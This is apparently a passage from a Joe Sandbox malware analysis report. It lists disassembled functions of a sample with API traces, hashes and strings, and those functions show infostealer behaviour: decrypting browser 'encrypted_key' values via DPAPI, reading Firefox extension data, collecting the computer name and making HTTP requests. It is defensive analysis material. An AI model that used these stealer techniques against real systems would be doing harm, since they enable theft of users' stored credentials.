                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                            • String ID: *>A
                                                                                                                                                                                                                            • API String ID: 3183270410-2324000863
                                                                                                                                                                                                                            • Opcode ID: 682d7451b07059949ef688f4e67d0a59911f18ee68ef595ae0e870f89720a860
                                                                                                                                                                                                                            • Instruction ID: 6633d685373ab45c8211bc738bf5b9d0ac44cdf8922bbde8cb97f055ad548524
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 682d7451b07059949ef688f4e67d0a59911f18ee68ef595ae0e870f89720a860
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BF0B475600208ABDB14EB68DC45FEE7BBC9B44B04F00006AF641D7290DEB4DAC58B99
                                                                                                                                                                                                                            Function 0040B307 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3AC
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040B4FE
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040B519
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040B56B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 211194620-0
                                                                                                                                                                                                                            • Opcode ID: 910fb197984527cdcfe17cc5d9ccb522993ee5dffb8f6abadc46a924ae042fc9
                                                                                                                                                                                                                            • Instruction ID: 3ec7e8d459c17c4ba2b3cc53c57d202e631d8954fb6531d8ac8215f7adabc5be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 910fb197984527cdcfe17cc5d9ccb522993ee5dffb8f6abadc46a924ae042fc9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48715E72A00119ABCF01FFA5ED469CD7775EF04309F11503AF500B71A2DBB8AE898B98
                                                                                                                                                                                                                            Function 0040D3E3 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                              • Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,?,00437530,0043687B), ref: 0040D474
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040D487
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                            • API String ID: 161838763-3310892237
                                                                                                                                                                                                                            • Opcode ID: 3289c798fc6c1636399050c6f0931d6368835119ce0ab75040b2dd58f45479ca
                                                                                                                                                                                                                            • Instruction ID: f585363b1073d73c679416fbfda7f8be5c0209c100797f23621ef1c9dee4fcd8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3289c798fc6c1636399050c6f0931d6368835119ce0ab75040b2dd58f45479ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE410A72A0011D9BCF11FFA6DE465CD77B4AF04308F51402AFD44B3192DABCAE898B99
                                                                                                                                                                                                                            Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                              • Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC65,?,?), ref: 004081E5
                                                                                                                                                                                                                              • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                                                                                                                              • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                                                                                                                              • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                                                                                                                              • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                                                                                                                              • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                                                                              • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080D8
                                                                                                                                                                                                                              • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB6A,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080FD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                            • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                                                            • API String ID: 2311102621-738592651
                                                                                                                                                                                                                            • Opcode ID: 1bd4c0b334f1eee68c966cea85af9871a662bf040a3a58fe5cf71bbe849dc783
                                                                                                                                                                                                                            • Instruction ID: 5d652ddacd3f0cc8d6f159dd16f681150e23373ddb7d5df4fae2268399efbaa7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bd4c0b334f1eee68c966cea85af9871a662bf040a3a58fe5cf71bbe849dc783
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B921C532E4020AABDF10EB91DD41ADE7774AF41364F1045BEE950B72D0DF38AA49CA58
                                                                                                                                                                                                                            Function 00416880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                              • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 004168B5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                            • String ID: ERROR$ERROR
                                                                                                                                                                                                                            • API String ID: 3086566538-2579291623
                                                                                                                                                                                                                            • Opcode ID: cac9703ab203475fa396fdaf6b98a980da18e442b8ee8f3f7fc8e7b3c4c0d57e
                                                                                                                                                                                                                            • Instruction ID: 1a3e91f55c678a087270c1db5f2d4501272bbb0eab73d9e6b4d818c4bfe9c2ae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cac9703ab203475fa396fdaf6b98a980da18e442b8ee8f3f7fc8e7b3c4c0d57e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24017C71A002189BCB20BB76D9869CD73A85F04304F114167BD14E3292D6BCE9898699
                                                                                                                                                                                                                            Function 00416ED9 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 00416F40
                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4198075804-0
                                                                                                                                                                                                                            • Opcode ID: 1461ab507dc6dfd35255e810fb889321eefe54f3dc9c2a7f5414d00745edce53
                                                                                                                                                                                                                            • Instruction ID: 92bf923f0917d822374c23a0111adfdcc0c83fadde586f70278f9170f8a7b62b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1461ab507dc6dfd35255e810fb889321eefe54f3dc9c2a7f5414d00745edce53
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4821483290021CABCF14EF55EC858DE7BB9FF44395F11812AF906A3151C779AA86CB98
                                                                                                                                                                                                                            Function 0041241B Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414ACD), ref: 00412435
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00414ACD,00414ACD,00000000,?,?,?,00414ACD), ref: 0041245C
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00414ACD), ref: 00412473
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1065093856-0
                                                                                                                                                                                                                            • Opcode ID: 8290f85b62bd7e33c2dcfbbc85231208eefcb9fd4bad64c91e3f3f76ae6d28f9
                                                                                                                                                                                                                            • Instruction ID: 4f26f4eda66c6aca4eaf9ff0ad07a1db09bb9ffa41640e3e93edbc8a46cc3130
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8290f85b62bd7e33c2dcfbbc85231208eefcb9fd4bad64c91e3f3f76ae6d28f9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF02471200108BFEF01AF64DD86EEB3B5CEF05398F001122F941D61A0D3A58F515BA9
                                                                                                                                                                                                                            Function 00410C5A Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C66
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C6D
                                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410C81
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4203777966-0
                                                                                                                                                                                                                            • Opcode ID: 6c13bdc48f24620c1458262451df69a1fa4e50b82ce9a072ad0b58c7c76c57f0
                                                                                                                                                                                                                            • Instruction ID: f6aeb2de1523635185e516c3bea9f441b1e125238e9ebec13057e88de697580f
